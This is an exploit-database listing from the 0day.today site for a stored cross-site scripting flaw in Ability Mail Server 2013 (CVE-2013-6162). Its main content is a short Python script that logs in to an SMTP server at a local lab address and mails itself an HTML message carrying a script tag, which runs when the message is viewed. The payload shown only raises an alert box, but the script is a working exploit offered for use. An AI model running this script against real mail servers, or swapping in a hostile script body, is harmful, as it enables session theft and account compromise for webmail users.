[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ability Mail Server 2013 (3.1.1) - Stored XSS Vulnerability

Author
David Um
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21685
Category
remote exploits
Date add
17-12-2013
CVE
CVE-2013-6162
Platform
windows
import smtplib
 
email_addr = 'user@hack.local'
 
email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'
s = smtplib.SMTP('192.168.58.140', 25)
 
s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()

#  0day.today [2024-06-16]  #